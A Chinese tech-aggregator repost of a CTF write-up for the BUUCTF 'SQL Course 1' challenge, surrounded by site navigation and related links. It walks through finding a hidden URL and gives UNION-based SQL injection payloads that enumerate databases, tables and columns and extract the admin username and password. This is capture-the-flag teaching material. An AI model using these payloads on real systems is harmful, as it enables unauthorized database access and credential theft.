我的编程空间,编程开发者的网络收藏夹
学习永远不晚
位置:首页-资讯-数据库

BUU SQL COURSE 1

2020-12-26 05:06

短信预约 信息系统项目管理师 报名、考试、查分时间动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号
获取短信验证
立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

BUU SQL COURSE 1

BUU SQL COURSE 1 [数据库教程]

0x01 题目分析

通过题目可以了解到这是一个SQL注入的题,但是打开网站后观察URL、对登录框抓包尝试后都无果。

技术图片

 

 这时就很迷,最后只能用老办法看看源码啥的有没有提示

 经过观察发现了一个隐藏的URL(心理想:这题是真的鬼[○?`Д′? ○])

技术图片

 

0x02 开始测试

 利用and 1=1 和 and 1=2根据页面回显进行判断

技术图片

 

 技术图片

 

利用order by 进行字段查看

技术图片

 

 进行回显判断

技术图片

 

 下面就可以进行暴库、暴表、暴字段的操作了

 1 暴库:(information_schema,ctftraining,mysql,performance_schema,test,news)
 2 ?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata
 3 
 4 暴表:(admin,contents)
 5 ?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"
 6 
 7 暴字段:(id,username,password)
 8 ?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"
 9 
10密码:
11 ?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin

Mysql中concat和group_concat的用法:https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc

 

最后出来了账号密码:

技术图片

 

 利用账号密码进行登录

技术图片

 

BUU SQL COURSE 1

原文地址:https://www.cnblogs.com/nmlwh/p/14724551.html

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

BUUSQLCOURSE1 数据库入门数据库基础教程数据库mysql
阅读原文内容投诉

BUU SQL COURSE 1

下载Word文档到电脑,方便收藏和打印~

下载Word文档

相关文章

猜你喜欢

BUU SQL COURSE 1

0x01 题目分析通过题目可以了解到这是一个SQL注入的题,但是打开网站后观察URL、对登录框抓包尝试后都无果。  这时就很迷,最后只能用老办法看看源码啥的有没有提示 经过观察发现了一个隐藏的URL(心理想:这题是真的鬼[○?`Д′? ○]) 0x02 开始测
BUU SQL COURSE 1
2020-12-26

BUU SQL COURSE 1 1(SQL注入)

2023-09-11

BUUCTF--BUU UPLOAD COURSE 1

2023-09-22

遇见SQL(1)

SQL自学笔记SQL的自我介绍SQL分类的画图演示  DDL操作数据库1.0 查询和创建   2.0 修改、删除、使用 操作表1.0 查询e2.创建   3.删除4.修改   DML1.0 添加数据 2.0 删除 3.0 修改 DQL1.0 基础查询 2.0
遇见SQL(1)
2017-12-31

SQL中“where 1=1”的用法

2024-04-02

SQL Server笔记1

2024-04-02

常用SQL语句(1)

2024-04-02

Sql-labs靶场(1~28)

2023-09-18

3-1 SQL Server 2005的

第3章   事务处理,并发控制及数据库优化l        SQL Server 2005的事务处理l        SQL Server 2005的并发控制l        SQL Server 2005数据库优化3-1 SQL Serv
2023-01-31

反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz

2023-09-21

数据库sql优化1

2024-04-02

1.sql数据处理问题

2024-04-02

sql语句中where 1=1的作用是什么

2024-04-02

SQL注入GetShell的方法(1)

2023-09-01

如何进行sql where 1=1的优缺点分析

2024-04-02

SQL语句中where 1=1指的是什么意思

2024-04-02

sql注入or1=1什么意思

sql 注入中的 "1=1" 表达式始终为真,允许攻击者绕过查询条件,访问或修改数据库数据,包括窃取敏感信息和修改数据库记录。为了防止 sql 注入,需要对用户输入进行验证和过滤,使用参数化查询或准备好的语句,并使用输入验证函数检查输入的格
sql注入or1=1什么意思
2024-06-12

SQL中"1=1"的陷阱:为什么应避免使用

避免使用SQL中的“1=1”技巧,因为它会导致性能问题和安全隐患。性能问题包括不必要的表扫描和索引旁路,而安全隐患则包括SQL注入攻击和授权绕过。最佳实践建议包括使用更具体的条件过滤数据,例如显式指定条件、使用子查询或视图。遵循这些建议可提高查询性能并保护数据安全。
SQL中
2024-04-02

SELECT 1 FROM TABLE,SQL语句中的1代表什么意思

2024-04-02

sql中where1=1是必须的吗

where 1=1 在 sql 中不是必需的。作为占位符或清除先前条件时可以使用,但不宜使用它进行过滤操作,因为它会强制扫描所有行并降低性能。其他实现相同效果的方法包括:where true、where not false 或省略 wher
sql中where1=1是必须的吗
2024-05-02

热门标签

Linux(148)PHP(127)Java(102)正则表达式(101)JavaScript(69)最佳实践(67)jQuery(44)MySQL(39)Docker(37)C语言(36)性能优化(34)Python(34)XML(28)string(27)第三方库(23)回调函数(23)ZIP(22)数组(22)可扩展性(22)字符串比较(21)find(20)RPM(20)Go(20)grep(19)ASP.NETCore(19)XML解析器(19)事件(19)事件处理程序(19)StringBuilder(18)Nginx(18)

编程热搜

查看更多

编程资源站

  • 资料下载
  • 历年试题
2021年下半年软考高级信息系统项目管理师高频考点精选资料
2021下半年软考高级信息系统技术知识点记忆口诀精选资料
2021下半年软考《信息系统项目管理师》考试真题及答案精选资料
2021下半年软考高级考试备考攻略精选资料
2021年软考高级《信息系统项目管理师》巩固练习题汇总精选资料
2021下半年软考高级信息系统项目管理师30个易考知识点汇总精选资料
2021下半年软考高级知识点这样记,还担心记不住吗精选资料
2021年下半年软考高级考试重点汇总精选资料
2021下半年软考高级信息系统项目管理师计算公式汇总精选资料
2021年下半年软考高级《信息系统项目管理师》模拟试题精选资料
查看更多
信息系统项目管理师选择题每日一练(2024)历年试题
2023年下半年信息系统项目管理师综合知识真题演练历年试题
查看更多

目录

本网页已闲置超过3分钟,按键盘任意键或点击空白处,即可回到网页
最新资讯更多
    友情链接编程网

    反馈

    我要
    反馈